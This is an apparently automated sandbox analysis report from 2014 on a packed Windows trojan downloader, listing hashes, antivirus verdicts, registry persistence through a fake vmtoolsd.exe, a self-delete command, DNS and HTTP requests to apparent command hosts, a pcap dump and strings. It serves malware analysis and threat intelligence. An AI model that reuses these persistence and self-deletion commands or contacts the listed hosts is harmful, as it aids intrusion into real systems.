Analysis Date2014-07-03 09:00:45
MD51778487352325b2b2351a9b6f6849111
SHA1e194694b3dcdb9d71120789ce02be11301e68209

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Sectionad!@.f md5: 4a09e67490a33572d3793dc6ac928079 sha1: 20d8589f9a0aceb25083b9d6e5a31ee7c8f60368 size: 512
Sectionad!@.f md5: df4c9af0e39c368587c70b8e532e33e3 sha1: 75115ebc2fbed75185de6f77376e58a3c5a170fa size: 24557
Sectionad!@.f md5: c950579aafcf78fa7421b6501aaa969e sha1: 8f7f64c8654c89b659dc3beb38f610f4082ec3a5 size: 9728
Sectionad!@.f md5: 84f1ebe52a2f7be1226964bd32c5f727 sha1: 9ea6d753710c9fc808afb2842160c94f571a6de6 size: 512
Timestamp2012-07-11 14:56:21
PackerUPX v0.80 - v0.84
PEhash4f61dbd0c4b25e2da42afb19d93448c06dbbeb4b
IMPhash469b1bae2575baede5bf1f06a01b4767
AV360 SafeTrojan.Generic.KDV.674225
AVAd-AwareTrojan.Generic.KDV.674225
AVAlwil (avast)Rootkit-gen [Rtk]
AVArcabit (arcavir)Packed.Klone.bu
AVAuthentiumno_virus
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)Trojan.Klone.r4
AVClamAVno_virus
AVDr. WebTrojan.DownLoader11.14380
AVEmsisoftTrojan.Generic.KDV.674225
AVEset (nod32)Win32/Alyak.E
AVFortinetW32/FraudPackTM.A!tr
AVFrisk (f-prot)no_virus
AVF-SecureTrojan.Generic.KDV.674225
AVGrisoft (avg)Generic32.UQT
AVIkarusPacked.Win32.Klone
AVK7Trojan ( 00067a4b1 )
AVKasperskyPacked.Win32.Klone.bu
AVMalwareBytesno_virus
AVMcafeeObfuscatedAJJ!hb!177848735232
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Kanav.C
AVMicroWorld (escan)Trojan.Generic.KDV.674225
AVNormanwin32:win32/SB/Obfuscated_FA
AVRisingTrojan.Win32.Vmtoolsd.a
AVSophosMal/EncPk-ACW
AVSymantecno_virus
AVTrend MicroTROJ_SPNR.35EF13
AVVirusBlokAda (vba32)TScope.Malware-Cryptor.SB

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{C6D90BAE-B89C-5BAC-0AC5-F01E87664EE3}\stubpath ➝
%SystemRoot%\system32\vmtoolsd.exe
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Creates FileC:\WINDOWS\system32\vmtoolsd.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\WINDOWS\system32\cmd.exe /c del C:\E19469~1.EXE > nul
Creates Processreg delete "HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{C6D90BAE-B89C-5BAC-0AC5-F01E87664EE3}" /f
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSgoogleads
Winsock URLhttp://www.issuejeju.com/poll/update.txt
Winsock URLhttp://blog.yahoo.com/naverblog/articles/601941/commentRss

Process
↳ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{C6D90BAE-B89C-5BAC-0AC5-F01E87664EE3}" /f

Process
↳ C:\WINDOWS\system32\cmd.exe /c del C:\E19469~1.EXE > nul

Creates Filenul
Deletes FileC:\malware.exe

Network Details:

DNSwww.issuejeju.com
Type: A
121.78.127.76
DNSany-rc.a01.yahoodns.net
Type: A
74.6.50.150
DNSany-rc.a01.yahoodns.net
Type: A
98.139.102.145
DNSblog.yahoo.com
Type: A
HTTP GEThttp://www.issuejeju.com/poll/update.txt
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
HTTP GEThttp://blog.yahoo.com/naverblog/articles/601941/commentRss
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Flows TCP192.168.1.1:1031 ➝ 121.78.127.76:80
Flows TCP192.168.1.1:1032 ➝ 74.6.50.150:80

Raw Pcap
0x00000000 (00000)   47455420 2f6e6176 6572626c 6f672f61   GET /naverblog/a
0x00000010 (00016)   72746963 6c65732f 36303139 34312f63   rticles/601941/c
0x00000020 (00032)   6f6d6d65 6e745273 73204854 54502f31   ommentRss HTTP/1
0x00000030 (00048)   2e310d0a 55736572 2d416765 6e743a20   .1..User-Agent: 
0x00000040 (00064)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x00000050 (00080)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x00000060 (00096)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x00000070 (00112)   313b2053 56313b20 2e4e4554 20434c52   1; SV1; .NET CLR
0x00000080 (00128)   20312e31 2e343332 32290d0a 486f7374    1.1.4322)..Host
0x00000090 (00144)   3a20626c 6f672e79 61686f6f 2e636f6d   : blog.yahoo.com
0x000000a0 (00160)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000b0 (00176)   206e6f2d 63616368 650d0a0d 0a          no-cache....

0x00000000 (00000)   47455420 2f706f6c 6c2f7570 64617465   GET /poll/update
0x00000010 (00016)   2e747874 20485454 502f312e 310d0a55   .txt HTTP/1.1..U
0x00000020 (00032)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000030 (00048)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000040 (00064)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000050 (00080)   6e646f77 73204e54 20352e31 3b205356   ndows NT 5.1; SV
0x00000060 (00096)   313b202e 4e455420 434c5220 312e312e   1; .NET CLR 1.1.
0x00000070 (00112)   34333232 290d0a48 6f73743a 20777777   4322)..Host: www
0x00000080 (00128)   2e697373 75656a65 6a752e63 6f6d0d0a   .issuejeju.com..
0x00000090 (00144)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000a0 (00160)   6f2d6361 6368650d 0a0d0a              o-cache....


Strings
.
...
^..
F&...&..:...P..
,.\
gW.dL..jn.FZ..*.|'y..
.
b
...:!....f...7
........
<<<Obsolete>>
030806000000Z
031204000000Z
070615000000Z
081022000000Z
0http://crl.verisign.com/ThawteTimestampingCA.crl0
100928081232Z0#
101123235959Z0
120614235959Z0\1
130805235959Z0U1
131203235959Z0S1
201231235959Z0
_3j}T_[ob
}5]6"Od
5LOsu7
5tswc|a
6^bMRQ4q
7GF-s6
?7!Op1
;/7^Wy4
960801000000Z
`ad!@.f
ad!@.f
/B1gwl5r
B61+3t
{BC0B5A0C-5DEE-E42D-3955-418D46BE15DC}{F4A53AF0-1487-7E10-4EA9-1447586D7AC0}{5CE5DA38-57DC-3735-7E11-C38986033769}{137E085F-FD11-0883-2CA1-63B9DDAA2D52}{BB5624C0-5AEA-9F68-8740-9287A319941C}{142309E1-A02B-B9FB-470B-7B4130DD3F90}{BCE40FC7-16EF-B6F7-2145-E953509A5E7F}{395A5449-16F6-CF28-2CD0-DBD9208A5F6F}{896481B8-89A0-C238-66A3-10A8894CC676}{0C0E961A-B4A8-E590-B49C-10C120397B82}{7057FF52-E58B-5F4B-090A-5BA99FEAB9FE}{C2F2AEE6-2A6A-2E10-C113-1512EF5992A6}{15F0109F-9436-C486-ADE1-5C1512342558}{463170A0-5AC5-AEBC-3B12-B60123398483}{DC63F462-2EFC-ABA8-7CF5-FEF226218987}{39561810-1F0E-92B6-381C-710B95DD1C53}
Beijing1
Beijing1)0'
bpc7lC
	Cape Town1
Certification Services Division1!0
cI@BUK
&*C: z
D$$hZF&<
D$Lh@?)
Durbanville1
DYkgQ	+t;
e|uovE
_FJ{LK
gcR)^ 
GetModuleHandleA
GetProcAddress
*GS0a@
-http://crl.thawte.com/ThawteCodeSigningCA.crl0
/http://crl.thawte.com/ThawtePremiumServerCA.crl0
"http://crl.verisign.com/tss-ca.crl0
http://ocsp.thawte.com0
http://ocsp.verisign.com0
http://www.360.cn 0
$*`hZz
JcEG.k
/J&!H{
K%&{7Q[
kA&ACT
KbYAOS
kernel32.dll
LoadLibraryA
N/P7ZG@
+NtE^v
]O=3{!
od[oP~
PC]]F :
.,pGv,
premium-server@thawte.com0
PrivateLabel2-1440
PxBOf]b1
 Qizhi Software (beijing) Co. Ltd0
 Qizhi Software (beijing) Co. Ltd1'0%
sAIW2P9E6
]+s{apgE
SECURE APPLICATION DEVELOPMENT1)0'
SM+Pq*
SrEscw+
t7&?ft
t$,h9)
Thawte1
Thawte Certification1
Thawte Code Signing CA
Thawte Code Signing CA0
Thawte Consulting cc1(0&
Thawte Consulting (Pty) Ltd.1
Thawte Premium Server CA1(0&
Thawte Timestamping CA0
!This program cannot be run in DOS mode.
TSA1-20
TSA2048-1-530
"u"1Kd(
uBGsW3;R
UeOiNC
VeriSign, Inc.1+0)
VeriSign, Inc.1402
"VeriSign Time Stamping Services CA
"VeriSign Time Stamping Services CA0
+VeriSign Time Stamping Services Signer - G20
VirtualAlloc
VirtualFree
VirtualProtect
<v\tHd
wc#lCg
Western Cape1
WlMwG0V
x`^^n7c"w6~
xp28Q,
Y=~c10
ZA1%0#
z;(~W+